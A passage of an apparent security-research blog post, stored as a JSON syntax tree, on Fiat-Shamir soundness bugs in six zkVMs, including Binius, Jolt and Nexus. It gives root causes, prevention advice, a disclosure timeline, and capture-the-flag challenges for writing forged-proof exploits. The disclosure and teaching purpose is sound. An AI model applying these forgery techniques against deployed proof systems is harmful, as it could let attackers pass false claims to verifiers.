"children":126243},{"className":126242,"style":117656},[309],[126244],{"type":25,"tag":216,"props":126245,"children":126246},{"style":25607},[126247,126251],{"type":25,"tag":216,"props":126248,"children":126250},{"className":126249,"style":2181},[319],[],{"type":25,"tag":216,"props":126252,"children":126254},{"className":126253},[2186,2187,2188,2189],[126255],{"type":25,"tag":216,"props":126256,"children":126258},{"className":126257},[246,2189],[126259,126264,126269],{"type":25,"tag":216,"props":126260,"children":126262},{"className":126261,"style":2467},[246,2151,2189],[126263],{"type":31,"value":2470},{"type":25,"tag":216,"props":126265,"children":126267},{"className":126266},[1864,2189],[126268],{"type":31,"value":1867},{"type":25,"tag":216,"props":126270,"children":126272},{"className":126271},[246,2151,2189],[126273],{"type":31,"value":7171},{"type":25,"tag":216,"props":126275,"children":126277},{"className":126276},[408],[126278],{"type":31,"value":411},{"type":25,"tag":216,"props":126280,"children":126282},{"className":126281},[304],[126283],{"type":25,"tag":216,"props":126284,"children":126286},{"className":126285,"style":118222},[309],[126287],{"type":25,"tag":216,"props":126288,"children":126289},{},[],{"type":25,"tag":216,"props":126291,"children":126293},{"className":126292,"style":1871},[257],[],{"type":25,"tag":216,"props":126295,"children":126297},{"className":126296},[246],[126298],{"type":25,"tag":216,"props":126299,"children":126301},{"className":126300},[246,31],[126302],{"type":25,"tag":216,"props":126303,"children":126305},{"className":126304},[246],[126306],{"type":31,"value":65643},{"type":25,"tag":216,"props":126308,"children":126310},{"className":126309},[287],[126311],{"type":31,"value":7701},{"type":25,"tag":216,"props":126313,"children":126315},{"className":126314,"style":2467},[246,2151],[126316],{"type":31,"value":2470},{"type":25,"tag":216,"props":126318,"children":126320},{"className":126319},[427],[126321],{"type":31,"value":19368},{"type":25,"tag":216,"props":126323,"children":126325},{"className":126324},[287],[126326],{"type":31,"value":7701},{"type":25,"tag":216,"props":126328,"children":126330},{"className":126329},[246,2151],[126331],{"type":31,"value":7171},{"type":25,"tag":216,"props":126333,"children":126335},{"className":126334},[427],[126336],{"type":31,"value":19368},{"type":25,"tag":216,"props":126338,"children":126340},{"className":126339,"style":335},[257],[],{"type":25,"tag":216,"props":126342,"children":126344},{"className":126343},[340],[126345],{"type":31,"value":343},{"type":25,"tag":216,"props":126347,"children":126349},{"className":126348,"style":335},[257],[],{"type":25,"tag":216,"props":126351,"children":126353},{"className":126352},[235],[126354,126359,126368,126373,126378,126383,126387,126444,126449,126453,126458],{"type":25,"tag":216,"props":126355,"children":126358},{"className":126356,"style":126357},[240],"height:1.0361em;vertical-align:-0.2861em;",[],{"type":25,"tag":216,"props":126360,"children":126362},{"className":126361},[246,31],[126363],{"type":25,"tag":216,"props":126364,"children":126366},{"className":126365},[246],[126367],{"type":31,"value":116579},{"type":25,"tag":216,"props":126369,"children":126371},{"className":126370},[287],[126372],{"type":31,"value":1850},{"type":25,"tag":216,"props":126374,"children":126376},{"className":126375},[246,2151],[126377],{"type":31,"value":7171},{"type":25,"tag":216,"props":126379,"children":126381},{"className":126380},[1864],[126382],{"type":31,"value":1867},{"type":25,"tag":216,"props":126384,"children":126386},{"className":126385,"style":1871},[257],[],{"type":25,"tag":216,"props":126388,"children":126390},{"className":126389},[246],[126391,126396],{"type":25,"tag":216,"props":126392,"children":126394},{"className":126393,"style":2752},[246,2151],[126395],{"type":31,"value":97829},{"type":25,"tag":216,"props":126397,"children":126399},{"className":126398},[2159],[126400],{"type":25,"tag":216,"props":126401,"children":126403},{"className":126402},[298,299],[126404,126433],{"type":25,"tag":216,"props":126405,"children":126407},{"className":126406},[304],[126408,126428],{"type":25,"tag":216,"props":126409,"children":126411},{"className":126410,"style":2270},[309],[126412],{"type":25,"tag":216,"props":126413,"children":126414},{"style":2774},[126415,126419],{"type":25,"tag":216,"props":126416,"children":126418},{"className":126417,"style":2181},[319],[],{"type":25,"tag":216,"props":126420,"children":126422},{"className":126421},[2186,2187,2188,2189],[126423],{"type":25,"tag":216,"props":126424,"children":126426},{"className":126425,"style":118207},[246,2151,2189],[126427],{"type":31,"value":12609},{"type":25,"tag":216,"props":126429,"children":126431},{"className":126430},[408],[126432],{"type":31,"value":411},{"type":25,"tag":216,"props":126434,"children":126436},{"className":126435},[304],[126437],{"type":25,"tag":216,"props":126438,"children":126440},{"className":126439,"style":122893},[309],[126441],{"type":25,"tag":216,"props":126442,"children":126443},{},[],{"type":25,"tag":216,"props":126445,"children":126447},{"className":126446},[427],[126448],{"type":31,"value":1888},{"type":25,"tag":216,"props":126450,"children":126452},{"className":126451,"style":335},[257],[],{"type":25,"tag":216,"props":126454,"children":126456},{"className":126455},[340],[126457],{"type":31,"value":343},{"type":25,"tag":216,"props":126459,"children":126461},{"className":126460,"style":335},[257],[],{"type":25,"tag":216,"props":126463,"children":126465},{"className":126464},[235],[126466,126470,126479,126484,126489,126494,126498,126508,126513,126522,126527,126536],{"type":25,"tag":216,"props":126467,"children":126469},{"className":126468,"style":96960},[240],[],{"type":25,"tag":216,"props":126471,"children":126473},{"className":126472},[246,31],[126474],{"type":25,"tag":216,"props":126475,"children":126477},{"className":126476},[246],[126478],{"type":31,"value":116579},{"type":25,"tag":216,"props":126480,"children":126482},{"className":126481},[287],[126483],{"type":31,"value":1850},{"type":25,"tag":216,"props":126485,"children":126487},{"className":126486,"style":2467},[246,2151],[126488],{"type":31,"value":2470},{"type":25,"tag":216,"props":126490,"children":126492},{"className":126491},[1864],[126493],{"type":31,"value":1867},{"type":25,"tag":216,"props":126495,"children":126497},{"className":126496,"style":1871},[257],[],{"type":25,"tag":216,"props":126499,"children":126501},{"className":126500},[246,31],[126502],{"type":25,"tag":216,"props":126503,"children":126505},{"className":126504},[246],[126506],{"type":31,"value":126507},"inout",{"type":25,"tag":216,"props":126509,"children":126511},{"className":126510,"style":2752},[246],[126512],{"type":31,"value":7031},{"type":25,"tag":216,"props":126514,"children":126516},{"className":126515},[246,31],[126517],{"type":25,"tag":216,"props":126518,"children":126520},{"className":126519},[246],[126521],{"type":31,"value":41511},{"type":25,"tag":216,"props":126523,"children":126525},{"className":126524,"style":2752},[246],[126526],{"type":31,"value":7031},{"type":25,"tag":216,"props":126528,"children":126530},{"className":126529},[246,31],[126531],{"type":25,"tag":216,"props":126532,"children":126534},{"className":126533},[246],[126535],{"type":31,"value":121768},{"type":25,"tag":216,"props":126537,"children":126539},{"className":126538},[427],[126540],{"type":31,"value":1888},{"type":25,"tag":38,"props":126542,"children":126543},{},[126544,126546,126551,126553,126626],{"type":31,"value":126545},"With challenges fixed (independent of ",{"type":25,"tag":82,"props":126547,"children":126549},{"className":126548},[],[126550],{"type":31,"value":65643},{"type":31,"value":126552},"), an attacker can find an alternate witness ",{"type":25,"tag":82,"props":126554,"children":126556},{"className":126555},[212,4702],[126557],{"type":25,"tag":216,"props":126558,"children":126560},{"className":126559},[224],[126561],{"type":25,"tag":216,"props":126562,"children":126564},{"className":126563,"ariaHidden":230},[229],[126565],{"type":25,"tag":216,"props":126566,"children":126568},{"className":126567},[235],[126569,126574],{"type":25,"tag":216,"props":126570,"children":126573},{"className":126571,"style":126572},[240],"height:1.0307em;vertical-align:-0.1944em;",[],{"type":25,"tag":216,"props":126575,"children":126577},{"className":126576},[246],[126578,126587],{"type":25,"tag":216,"props":126579,"children":126581},{"className":126580},[246,31],[126582],{"type":25,"tag":216,"props":126583,"children":126585},{"className":126584},[246],[126586],{"type":31,"value":65643},{"type":25,"tag":216,"props":126588,"children":126590},{"className":126589},[2159],[126591],{"type":25,"tag":216,"props":126592,"children":126594},{"className":126593},[298],[126595],{"type":25,"tag":216,"props":126596,"children":126598},{"className":126597},[304],[126599],{"type":25,"tag":216,"props":126600,"children":126603},{"className":126601,"style":126602},[309],"height:0.8362em;",[126604],{"type":25,"tag":216,"props":126605,"children":126607},{"style":126606},"top:-3.1473em;margin-right:0.05em;",[126608,126612],{"type":25,"tag":216,"props":126609,"children":126611},{"className":126610,"style":2181},[319],[],{"type":25,"tag":216,"props":126613,"children":126615},{"className":126614},[2186,2187,2188,2189],[126616],{"type":25,"tag":216,"props":126617,"children":126619},{"className":126618},[246,2189],[126620],{"type":25,"tag":216,"props":126621,"children":126623},{"className":126622},[246,2189],[126624],{"type":31,"value":126625},"′",{"type":31,"value":126627}," that produces the same evaluation. This is a single 128-bit linear constraint over hundreds of bits, yielding a single linear equation in a high-dimensional binary witness space, which is typically underconstrained and admits many alternative witnesses under common parameterizations.",{"type":25,"tag":38,"props":126629,"children":126630},{},[126631,126635,126637],{"type":25,"tag":9273,"props":126632,"children":126633},{},[126634],{"type":31,"value":120693},{"type":31,"value":126636}," Fixed on December 29, 2025 via ",{"type":25,"tag":162,"props":126638,"children":126641},{"href":126639,"rel":126640},"https://github.com/binius-zk/binius64/pull/1355/commits/86a515f0632d2acdf547ed82780dfe7f9f39358f",[166],[126642],{"type":31,"value":126643},"commit 86a515f",{"type":25,"tag":22753,"props":126645,"children":126646},{},[],{"type":25,"tag":26,"props":126648,"children":126650},{"id":126649},"why-does-this-keep-happening",[126651],{"type":31,"value":126652},"Why Does This Keep Happening?",{"type":25,"tag":38,"props":126654,"children":126655},{},[126656],{"type":31,"value":126657},"Given that we found the same bug class in six independent implementations, at some point we have to ask whether there is a systemic issue making this mistake so common.",{"type":25,"tag":606,"props":126659,"children":126661},{"id":126660},"academic-papers-dont-specify-fiat-shamir",[126662],{"type":31,"value":126663},"Academic Papers Don't Specify Fiat-Shamir",{"type":25,"tag":38,"props":126665,"children":126666},{},[126667,126669,126674,126676,126701,126703,126706,126708,126733,126735,126760],{"type":31,"value":126668},"Academic papers usually describe ",{"type":25,"tag":64,"props":126670,"children":126671},{},[126672],{"type":31,"value":126673},"interactive",{"type":31,"value":126675}," protocols: \"Prover sends ",{"type":25,"tag":82,"props":126677,"children":126679},{"className":126678},[212,4702],[126680],{"type":25,"tag":216,"props":126681,"children":126683},{"className":126682},[224],[126684],{"type":25,"tag":216,"props":126685,"children":126687},{"className":126686,"ariaHidden":230},[229],[126688],{"type":25,"tag":216,"props":126689,"children":126691},{"className":126690},[235],[126692,126696],{"type":25,"tag":216,"props":126693,"children":126695},{"className":126694,"style":4799},[240],[],{"type":25,"tag":216,"props":126697,"children":126699},{"className":126698,"style":26065},[246,2151],[126700],{"type":31,"value":120212},{"type":31,"value":126702},". Verifier sends",{"type":25,"tag":34930,"props":126704,"children":126705},{},[],{"type":31,"value":126707},"random ",{"type":25,"tag":82,"props":126709,"children":126711},{"className":126710},[212,4702],[126712],{"type":25,"tag":216,"props":126713,"children":126715},{"className":126714},[224],[126716],{"type":25,"tag":216,"props":126717,"children":126719},{"className":126718,"ariaHidden":230},[229],[126720],{"type":25,"tag":216,"props":126721,"children":126723},{"className":126722},[235],[126724,126728],{"type":25,"tag":216,"props":126725,"children":126727},{"className":126726,"style":6315},[240],[],{"type":25,"tag":216,"props":126729,"children":126731},{"className":126730,"style":2752},[246,2151],[126732],{"type":31,"value":97829},{"type":31,"value":126734},". Prover sends ",{"type":25,"tag":82,"props":126736,"children":126738},{"className":126737},[212,4702],[126739],{"type":25,"tag":216,"props":126740,"children":126742},{"className":126741},[224],[126743],{"type":25,"tag":216,"props":126744,"children":126746},{"className":126745,"ariaHidden":230},[229],[126747],{"type":25,"tag":216,"props":126748,"children":126750},{"className":126749},[235],[126751,126755],{"type":25,"tag":216,"props":126752,"children":126754},{"className":126753,"style":4799},[240],[],{"type":25,"tag":216,"props":126756,"children":126758},{"className":126757,"style":2896},[246,2151],[126759],{"type":31,"value":2899},{"type":31,"value":126761},".\"",{"type":25,"tag":38,"props":126763,"children":126764},{},[126765,126767,126792,126794,126819],{"type":31,"value":126766},"They often omit the necessary steps to make the protocol non-interactive: \"Hash ",{"type":25,"tag":82,"props":126768,"children":126770},{"className":126769},[212,4702],[126771],{"type":25,"tag":216,"props":126772,"children":126774},{"className":126773},[224],[126775],{"type":25,"tag":216,"props":126776,"children":126778},{"className":126777,"ariaHidden":230},[229],[126779],{"type":25,"tag":216,"props":126780,"children":126782},{"className":126781},[235],[126783,126787],{"type":25,"tag":216,"props":126784,"children":126786},{"className":126785,"style":4799},[240],[],{"type":25,"tag":216,"props":126788,"children":126790},{"className":126789,"style":26065},[246,2151],[126791],{"type":31,"value":120212},{"type":31,"value":126793}," before sampling ",{"type":25,"tag":82,"props":126795,"children":126797},{"className":126796},[212,4702],[126798],{"type":25,"tag":216,"props":126799,"children":126801},{"className":126800},[224],[126802],{"type":25,"tag":216,"props":126803,"children":126805},{"className":126804,"ariaHidden":230},[229],[126806],{"type":25,"tag":216,"props":126807,"children":126809},{"className":126808},[235],[126810,126814],{"type":25,"tag":216,"props":126811,"children":126813},{"className":126812,"style":6315},[240],[],{"type":25,"tag":216,"props":126815,"children":126817},{"className":126816,"style":2752},[246,2151],[126818],{"type":31,"value":97829},{"type":31,"value":126820},". Also hash the public statement. Also hash intermediate values that affect later equations.\"",{"type":25,"tag":38,"props":126822,"children":126823},{},[126824],{"type":31,"value":126825},"Security proofs thus also analyze the interactive protocols where binding is implicit. The responsibility of determining what to include in the transcript therefore falls on the implementor, which may not have a good understanding of the full protocol.",{"type":25,"tag":606,"props":126827,"children":126829},{"id":126828},"the-hot-potato-problem",[126830],{"type":31,"value":126831},"The Hot Potato Problem",{"type":25,"tag":38,"props":126833,"children":126834},{},[126835],{"type":31,"value":126836},"Modern zkVMs are modular:",{"type":25,"tag":38,"props":126838,"children":126839},{},[126840],{"type":25,"tag":6467,"props":126841,"children":126844},{"alt":126842,"src":126843},"11_hot_potato","/posts/zkvms-unfaithful-claims/11_hot_potato.svg",[],{"type":25,"tag":38,"props":126846,"children":126847},{},[126848],{"type":31,"value":126849},"It often happens that each layer assumes the previous/next layer handles the transcript binding for a value, so in the end it never happens.",{"type":25,"tag":606,"props":126851,"children":126853},{"id":126852},"optimization-pressure",[126854],{"type":31,"value":126855},"Optimization Pressure",{"type":25,"tag":38,"props":126857,"children":126858},{},[126859],{"type":31,"value":126860},"Performance is existential for ZK. Since every hash operation has a cost, there is constant pressure to exclude values that are \"probably fine\" to leave out.",{"type":25,"tag":38,"props":126862,"children":126863},{},[126864],{"type":31,"value":126865},"There are indeed cases when this can be done safely, but determining what is safe requires a full understanding of all protocols involved, and the decision to exclude something should be double and triple checked by experts.",{"type":25,"tag":606,"props":126867,"children":126869},{"id":126868},"testing-doesnt-catch-adversarial-inputs",[126870],{"type":31,"value":126871},"Testing Doesn't Catch Adversarial Inputs",{"type":25,"tag":38,"props":126873,"children":126874},{},[126875],{"type":31,"value":126876},"Unit tests run the honest prover. Integration tests run the honest prover. Fuzzing only randomly perturbs values and has a very low probability of succeeding in fooling a verifier. Identifying Fiat-Shamir bugs requires thorough manual security analysis, and sometimes even that falls short.",{"type":25,"tag":22753,"props":126878,"children":126879},{},[],{"type":25,"tag":26,"props":126881,"children":126883},{"id":126882},"how-to-find-and-fix-these-bugs",[126884],{"type":31,"value":126885},"How to Find and Fix These Bugs",{"type":25,"tag":606,"props":126887,"children":126889},{"id":126888},"prevention",[126890],{"type":31,"value":126891},"Prevention",{"type":25,"tag":38,"props":126893,"children":126894},{},[126895],{"type":31,"value":126896},"Fiat-Shamir has long been a known source of soundness bugs, which has driven the development of primitives that make implementation less error-prone.",{"type":25,"tag":38,"props":126898,"children":126899},{},[126900],{"type":31,"value":126901},"One such tool is to merge the proof and transcript, to force all values that are sent by the prover to be automatically absorbed into the transcript.",{"type":25,"tag":38,"props":126903,"children":126904},{},[126905],{"type":31,"value":126906},"The prover holds a proof buffer which emulates the communication channel between prover and verifier. When a value is sent by the prover it is added to the proof buffer and automatically absorbed into the transcript. When the prover then needs to read a challenge from the verifier it simply squeezes from the current transcript.",{"type":25,"tag":38,"props":126908,"children":126909},{},[126910],{"type":31,"value":126911},"This can then be done in reverse for the verifier. It gradually reads values from the proof buffer and can thus sync the transcript state and derive the same challenges.",{"type":25,"tag":38,"props":126913,"children":126914},{},[126915],{"type":31,"value":126916},"Halo2 follows this pattern, and Binius is transcript-centric as well. But even with a merged proof/transcript, statement data (e.g., public inputs) must still be absorbed before sampling any challenges that govern equations depending on them—and as Binius demonstrates, even transcript-centric systems can miss this.",{"type":25,"tag":22753,"props":126918,"children":126919},{},[],{"type":25,"tag":26,"props":126921,"children":126923},{"id":126922},"responsible-disclosure-timeline",[126924],{"type":31,"value":126925},"Responsible Disclosure Timeline",{"type":25,"tag":59713,"props":126927,"children":126928},{},[126929,126957],{"type":25,"tag":126930,"props":126931,"children":126932},"thead",{},[126933],{"type":25,"tag":126934,"props":126935,"children":126936},"tr",{},[126937,126942,126947,126952],{"type":25,"tag":126938,"props":126939,"children":126940},"th",{},[126941],{"type":31,"value":27154},{"type":25,"tag":126938,"props":126943,"children":126944},{},[126945],{"type":31,"value":126946},"Reported",{"type":25,"tag":126938,"props":126948,"children":126949},{},[126950],{"type":31,"value":126951},"Fixed",{"type":25,"tag":126938,"props":126953,"children":126954},{},[126955],{"type":31,"value":126956},"Response Time",{"type":25,"tag":126958,"props":126959,"children":126960},"tbody",{},[126961,126984,127005,127025,127047,127068],{"type":25,"tag":126934,"props":126962,"children":126963},{},[126964,126969,126974,126979],{"type":25,"tag":126965,"props":126966,"children":126967},"td",{},[126968],{"type":31,"value":111818},{"type":25,"tag":126965,"props":126970,"children":126971},{},[126972],{"type":31,"value":126973},"Sep 2025",{"type":25,"tag":126965,"props":126975,"children":126976},{},[126977],{"type":31,"value":126978},"Oct 3, 2025",{"type":25,"tag":126965,"props":126980,"children":126981},{},[126982],{"type":31,"value":126983},"\u003C1 week",{"type":25,"tag":126934,"props":126985,"children":126986},{},[126987,126991,126996,127001],{"type":25,"tag":126965,"props":126988,"children":126989},{},[126990],{"type":31,"value":111824},{"type":25,"tag":126965,"props":126992,"children":126993},{},[126994],{"type":31,"value":126995},"Oct 2025",{"type":25,"tag":126965,"props":126997,"children":126998},{},[126999],{"type":31,"value":127000},"Oct 24, 2025",{"type":25,"tag":126965,"props":127002,"children":127003},{},[127004],{"type":31,"value":126983},{"type":25,"tag":126934,"props":127006,"children":127007},{},[127008,127012,127016,127021],{"type":25,"tag":126965,"props":127009,"children":127010},{},[127011],{"type":31,"value":111830},{"type":25,"tag":126965,"props":127013,"children":127014},{},[127015],{"type":31,"value":126995},{"type":25,"tag":126965,"props":127017,"children":127018},{},[127019],{"type":31,"value":127020},"Oct 31, 2025",{"type":25,"tag":126965,"props":127022,"children":127023},{},[127024],{"type":31,"value":126983},{"type":25,"tag":126934,"props":127026,"children":127027},{},[127028,127032,127037,127042],{"type":25,"tag":126965,"props":127029,"children":127030},{},[127031],{"type":31,"value":111836},{"type":25,"tag":126965,"props":127033,"children":127034},{},[127035],{"type":31,"value":127036},"Nov 2025",{"type":25,"tag":126965,"props":127038,"children":127039},{},[127040],{"type":31,"value":127041},"Mar 5, 2026",{"type":25,"tag":126965,"props":127043,"children":127044},{},[127045],{"type":31,"value":127046},"~4 months",{"type":25,"tag":126934,"props":127048,"children":127049},{},[127050,127054,127059,127064],{"type":25,"tag":126965,"props":127051,"children":127052},{},[127053],{"type":31,"value":111848},{"type":25,"tag":126965,"props":127055,"children":127056},{},[127057],{"type":31,"value":127058},"Dec 2025",{"type":25,"tag":126965,"props":127060,"children":127061},{},[127062],{"type":31,"value":127063},"Dec 29, 2025",{"type":25,"tag":126965,"props":127065,"children":127066},{},[127067],{"type":31,"value":126983},{"type":25,"tag":126934,"props":127069,"children":127070},{},[127071,127075,127079,127084],{"type":25,"tag":126965,"props":127072,"children":127073},{},[127074],{"type":31,"value":111842},{"type":25,"tag":126965,"props":127076,"children":127077},{},[127078],{"type":31,"value":127036},{"type":25,"tag":126965,"props":127080,"children":127081},{},[127082],{"type":31,"value":127083},"Jan 21, 2026?",{"type":25,"tag":126965,"props":127085,"children":127086},{},[127087],{"type":31,"value":127088},"3 months",{"type":25,"tag":38,"props":127090,"children":127091},{},[127092],{"type":31,"value":127093},"All six teams were notified; responses ranged from immediate acknowledgement to delayed fix, and all reported issues have since been addressed.",{"type":25,"tag":22753,"props":127095,"children":127096},{},[],{"type":25,"tag":26,"props":127098,"children":127100},{"id":127099},"challenges",[127101],{"type":31,"value":111861},{"type":25,"tag":38,"props":127103,"children":127104},{},[127105,127107],{"type":31,"value":127106},"Do you think you have a good understanding of these bugs? We have prepared challenges to allow you to practice implementing two of these exploits. If you solve any of them, follow the instructions in the flag ",{"type":25,"tag":127108,"props":127109,"children":127110},"del",{},[127111],{"type":31,"value":127112},"the first 10 solvers will get a T-shirt.",{"type":25,"tag":38,"props":127114,"children":127115},{},[127116,127118,127171,127172,127428],{"type":31,"value":127117},"Your goal is to find a counter example of Fermat's Last Theorem, i.e you know ",{"type":25,"tag":82,"props":127119,"children":127121},{"className":127120},[212,4702],[127122],{"type":25,"tag":216,"props":127123,"children":127125},{"className":127124},[224],[127126],{"type":25,"tag":216,"props":127127,"children":127129},{"className":127128,"ariaHidden":230},[229],[127130],{"type":25,"tag":216,"props":127131,"children":127133},{"className":127132},[235],[127134,127138,127143,127148,127152,127157,127162,127166],{"type":25,"tag":216,"props":127135,"children":127137},{"className":127136,"style":1519},[240],[],{"type":25,"tag":216,"props":127139,"children":127141},{"className":127140},[246,2151],[127142],{"type":31,"value":162},{"type":25,"tag":216,"props":127144,"children":127146},{"className":127145},[1864],[127147],{"type":31,"value":1867},{"type":25,"tag":216,"props":127149,"children":127151},{"className":127150,"style":1871},[257],[],{"type":25,"tag":216,"props":127153,"children":127155},{"className":127154},[246,2151],[127156],{"type":31,"value":7171},{"type":25,"tag":216,"props":127158,"children":127160},{"className":127159},[1864],[127161],{"type":31,"value":1867},{"type":25,"tag":216,"props":127163,"children":127165},{"className":127164,"style":1871},[257],[],{"type":25,"tag":216,"props":127167,"children":127169},{"className":127168},[246,2151],[127170],{"type":31,"value":2254},{"type":31,"value":113654},{"type":25,"tag":82,"props":127173,"children":127175},{"className":127174},[212,4702],[127176],{"type":25,"tag":216,"props":127177,"children":127179},{"className":127178},[224],[127180],{"type":25,"tag":216,"props":127181,"children":127183},{"className":127182,"ariaHidden":230},[229],[127184,127247,127309,127415],{"type":25,"tag":216,"props":127185,"children":127187},{"className":127186},[235],[127188,127193,127234,127238,127243],{"type":25,"tag":216,"props":127189,"children":127192},{"className":127190,"style":127191},[240],"height:0.8974em;vertical-align:-0.0833em;",[],{"type":25,"tag":216,"props":127194,"children":127196},{"className":127195},[246],[127197,127202],{"type":25,"tag":216,"props":127198,"children":127200},{"className":127199},[246,2151],[127201],{"type":31,"value":162},{"type":25,"tag":216,"props":127203,"children":127205},{"className":127204},[2159],[127206],{"type":25,"tag":216,"props":127207,"children":127209},{"className":127208},[298],[127210],{"type":25,"tag":216,"props":127211,"children":127213},{"className":127212},[304],[127214],{"type":25,"tag":216,"props":127215,"children":127217},{"className":127216,"style":7974},[309],[127218],{"type":25,"tag":216,"props":127219,"children":127220},{"style":6104},[127221,127225],{"type":25,"tag":216,"props":127222,"children":127224},{"className":127223,"style":2181},[319],[],{"type":25,"tag":216,"props":127226,"children":127228},{"className":127227},[2186,2187,2188,2189],[127229],{"type":25,"tag":216,"props":127230,"children":127232},{"className":127231},[246,2189],[127233],{"type":31,"value":21253},{"type":25,"tag":216,"props":127235,"children":127237},{"className":127236,"style":335},[257],[],{"type":25,"tag":216,"props":127239,"children":127241},{"className":127240},[340],[127242],{"type":31,"value":3539},{"type":25,"tag":216,"props":127244,"children":127246},{"className":127245,"style":335},[257],[],{"type":25,"tag":216,"props":127248,"children":127250},{"className":127249},[235],[127251,127255,127296,127300,127305],{"type":25,"tag":216,"props":127252,"children":127254},{"className":127253,"style":7974},[240],[],{"type":25,"tag":216,"props":127256,"children":127258},{"className":127257},[246],[127259,127264],{"type":25,"tag":216,"props":127260,"children":127262},{"className":127261},[246,2151],[127263],{"type":31,"value":7171},{"type":25,"tag":216,"props":127265,"children":127267},{"className":127266},[2159],[127268],{"type":25,"tag":216,"props":127269,"children":127271},{"className":127270},[298],[127272],{"type":25,"tag":216,"props":127273,"children":127275},{"className":127274},[304],[127276],{"type":25,"tag":216,"props":127277,"children":127279},{"className":127278,"style":7974},[309],[127280],{"type":25,"tag":216,"props":127281,"children":127282},{"style":6104},[127283,127287],{"type":25,"tag":216,"props":127284,"children":127286},{"className":127285,"style":2181},[319],[],{"type":25,"tag":216,"props":127288,"children":127290},{"className":127289},[2186,2187,2188,2189],[127291],{"type":25,"tag":216,"props":127292,"children":127294},{"className":127293},[246,2189],[127295],{"type":31,"value":21253},{"type":25,"tag":216,"props":127297,"children":127299},{"className":127298,"style":258},[257],[],{"type":25,"tag":216,"props":127301,"children":127303},{"className":127302},[263],[127304],{"type":31,"value":266},{"type":25,"tag":216,"props":127306,"children":127308},{"className":127307,"style":258},[257],[],{"type":25,"tag":216,"props":127310,"children":127312},{"className":127311},[235],[127313,127318,127359,127364,127368,127373,127378,127382,127387,127392,127396,127401,127405,127411],{"type":25,"tag":216,"props":127314,"children":127317},{"className":127315,"style":127316},[240],"height:1.0085em;vertical-align:-0.1944em;",[],{"type":25,"tag":216,"props":127319,"children":127321},{"className":127320},[246],[127322,127327],{"type":25,"tag":216,"props":127323,"children":127325},{"className":127324},[246,2151],[127326],{"type":31,"value":2254},{"type":25,"tag":216,"props":127328,"children":127330},{"className":127329},[2159],[127331],{"type":25,"tag":216,"props":127332,"children":127334},{"className":127333},[298],[127335],{"type":25,"tag":216,"props":127336,"children":127338},{"className":127337},[304],[127339],{"type":25,"tag":216,"props":127340,"children":127342},{"className":127341,"style":7974},[309],[127343],{"type":25,"tag":216,"props":127344,"children":127345},{"style":6104},[127346,127350],{"type":25,"tag":216,"props":127347,"children":127349},{"className":127348,"style":2181},[319],[],{"type":25,"tag":216,"props":127351,"children":127353},{"className":127352},[2186,2187,2188,2189],[127354],{"type":25,"tag":216,"props":127355,"children":127357},{"className":127356},[246,2189],[127358],{"type":31,"value":21253},{"type":25,"tag":216,"props":127360,"children":127362},{"className":127361},[1864],[127363],{"type":31,"value":1867},{"type":25,"tag":216,"props":127365,"children":127367},{"className":127366,"style":1871},[257],[],{"type":25,"tag":216,"props":127369,"children":127371},{"className":127370},[246,2151],[127372],{"type":31,"value":162},{"type":25,"tag":216,"props":127374,"children":127376},{"className":127375},[1864],[127377],{"type":31,"value":1867},{"type":25,"tag":216,"props":127379,"children":127381},{"className":127380,"style":1871},[257],[],{"type":25,"tag":216,"props":127383,"children":127385},{"className":127384},[246,2151],[127386],{"type":31,"value":7171},{"type":25,"tag":216,"props":127388,"children":127390},{"className":127389},[1864],[127391],{"type":31,"value":1867},{"type":25,"tag":216,"props":127393,"children":127395},{"className":127394,"style":1871},[257],[],{"type":25,"tag":216,"props":127397,"children":127399},{"className":127398},[246,2151],[127400],{"type":31,"value":2254},{"type":25,"tag":216,"props":127402,"children":127404},{"className":127403,"style":258},[257],[],{"type":25,"tag":216,"props":127406,"children":127408},{"className":127407},[263],[127409],{"type":31,"value":127410},"≥",{"type":25,"tag":216,"props":127412,"children":127414},{"className":127413,"style":258},[257],[],{"type":25,"tag":216,"props":127416,"children":127418},{"className":127417},[235],[127419,127423],{"type":25,"tag":216,"props":127420,"children":127422},{"className":127421,"style":5293},[240],[],{"type":25,"tag":216,"props":127424,"children":127426},{"className":127425},[246],[127427],{"type":31,"value":184},{"type":31,"value":127429},". Good luck!",{"type":25,"tag":606,"props":127431,"children":127433},{"id":127432},"jolt",[127434],{"type":31,"value":111818},{"type":25,"tag":38,"props":127436,"children":127437},{},[127438,127440,127451,127453],{"type":31,"value":127439},"See ",{"type":25,"tag":162,"props":127441,"children":127448},{"href":127442,"target":127443,"rel":127444,"download":127447},"/posts/zkvms-unfaithful-claims/handout_jolt.tar.gz","_blank",[127445,127446],"noopener","noreferrer","handout_jolt.tar.gz",[127449],{"type":31,"value":127450},"the handout",{"type":31,"value":127452}," for the setup running on the server.\nSubmit your proof by connecting to ",{"type":25,"tag":82,"props":127454,"children":127456},{"className":127455},[],[127457],{"type":31,"value":127458},"jolt.chal.osec.io:8960",{"type":25,"tag":606,"props":127460,"children":127462},{"id":127461},"nexus-1",[127463],{"type":31,"value":111824},{"type":25,"tag":38,"props":127465,"children":127466},{},[127467,127468,127475,127476],{"type":31,"value":127439},{"type":25,"tag":162,"props":127469,"children":127473},{"href":127470,"target":127443,"rel":127471,"download":127472},"/posts/zkvms-unfaithful-claims/handout_nexus.tar.gz",[127445,127446],"handout_nexus.tar.gz",[127474],{"type":31,"value":127450},{"type":31,"value":127452},{"type":25,"tag":82,"props":127477,"children":127479},{"className":127478},[],[127480],{"type":31,"value":127481},"nexus.chal.osec.io:8950",{"type":25,"tag":38,"props":127483,"children":127484},{},[127485],{"type":31,"value":127486},"Now you should have enough margin to prove Fermat wrong.",{"type":25,"tag":22753,"props":127488,"children":127489},{},[],{"type":25,"tag":26,"props":127491,"children":127493},{"id":127492},"takeaways",[127494],{"type":31,"value":127495},"Takeaways",{"type":25,"tag":38,"props":127497,"children":127498},{},[127499],{"type":31,"value":127500},"We found critical soundness vulnerabilities in six separate zkVMs. All share the same root cause: prover-controlled values that affect verification equations were not bound to the Fiat-Shamir transcript before challenges were derived.",{"type":25,"tag":38,"props":127502,"children":127503},{},[127504],{"type":31,"value":127505},"The fix in each case is trivial—one or two lines of code. But finding the bug requires understanding the full verification flow and asking: \"What if the prover chose this value after seeing the challenges?\"",{"type":25,"tag":38,"props":127507,"children":127508},{},[127509,127514],{"type":25,"tag":9273,"props":127510,"children":127511},{},[127512],{"type":31,"value":127513},"For the ZK ecosystem:",{"type":31,"value":127515}," The Fiat-Shamir transform looks simple. Hash everything, derive challenges. In practice, \"everything\" is hard to specify when you have dozens of components, each with its own inputs and outputs, each expecting someone else to handle 